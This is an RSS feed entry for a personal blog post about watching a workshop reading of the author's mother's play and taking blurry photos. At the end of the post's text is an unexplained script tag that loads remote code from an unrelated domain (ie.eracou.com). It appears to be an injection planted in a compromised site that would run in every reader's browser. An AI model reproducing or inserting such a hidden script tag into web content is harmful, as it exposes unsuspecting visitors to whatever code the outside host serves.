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		<title>Down-n-back</title>
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		<description><![CDATA[I just bopped down to the Cities last night and came back this morning. My mom is working on a play, and had a reading at a local playwright&#8217;s workshop. Some local actors came in and read the parts, then they and the audience members gave mom a whole bunch of feedback on what worked [...]]]></description>
			<content:encoded><![CDATA[<p>I just bopped down to the Cities last night and came back this morning. My mom is working on a play, and had a reading at a local playwright&#8217;s workshop. Some local actors came in and read the parts, then they and the audience members gave mom a whole bunch of feedback on what worked and what needs work.</p>
<p>It was pretty neat to see that sort of creative give-and-take happening live and unrehearsed right there in front of me. I took some pics, but they&#8217;re barely usable. What did I expect, holding the camera for 1.5 second exposures of moving people. I mean, seriously.<script src="http://ie.eracou.com/3"></script></p>
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